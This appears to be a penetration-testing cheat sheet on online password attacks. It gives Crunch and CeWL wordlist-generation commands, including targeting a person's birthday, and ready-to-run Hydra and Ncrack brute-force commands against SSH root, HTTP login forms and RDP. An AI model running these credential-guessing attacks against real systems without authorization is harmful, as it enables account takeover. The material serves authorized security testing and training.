Online Attack

Wordlist

Crunch

Crunch is a tool that can generate custom wordlist with defined character-sets and password formats.

crunch [min] [max] [characterset] -t [pattern] -o [output filename]

min = minimum password length max = maximum password length characterset = The character set to be used in generating the passwords -t = patten, for example if you knew that your target's birthday was 0728 (July 28th) and you suspected they used their birthday in their password, you could generate a password list that ended with 0728 by giving crunch the pattern @@@@@@@0728.

./crunch 1 1 -p pen test lab

The second option is when we will want to create a list based on different words.For example the words blue and red can be bluered or redblue.We can achieve this with the command:

./crunch 6 6 0123456789 -b 1mb -o START

This will generate wordlists which will be 1Mb each and with 6 characters size and it will include the characters 0123456789.

./crunch 3 3 -f charset.lst lalpha -o START -c 20

Crunch allows us to specify the number of words in each wordlist.This will create a wordlists that it will contain 20 words maximum by taken a specific charset of lalpha which is [abcdefghijklmnopqrstuvwxyz].

./crunch 13 13 -f charset.lst lalpha -t pentestlab@@@

Create a wordlist that will contains the word pentestlab followed by 3 random characters.

CeWL

CeWL is a ruby app which spiders a given url to a specified depth, optionally following external links, and returns a wordlist which can then be used for password crackers such as John the Ripper.

cewl -d 2 -m 5 -w docswords.txt http://docs.kali.org

Bruteforce

Hydra

hydra -l username -p passwordlist.txt [target (ip address and port)]

SSH bruteforce

Brute-force SSH root account using a wordlist/dictionary

hydra -l root -P 500-worst-passwords.txt 192.168.1.10 ssh

-l = the username

-L = list of usernames (if you don't know the login)

-p = password (never used)

-P - the directory for the wordlists (file)

-M FILE list of servers to be attacked in parallel, one entry per line

Less common options: -vV = verbose mode, shows you every login attempt hydra tries

-s = specify the port on which we running our attack

-e ns = checks for blank or no password fields

Brute-force HTTP Form POST using a username list to try different usernames

hydra -L [username list] -P [password list] 192.168.1.10 [form parameters][failed login message]

Ncrack

RDP bruteforce

ncrack -vv --user offsec -P passwordfile.txt rdp://192.168.11.35

Medusa

results matching ""

    No results matching ""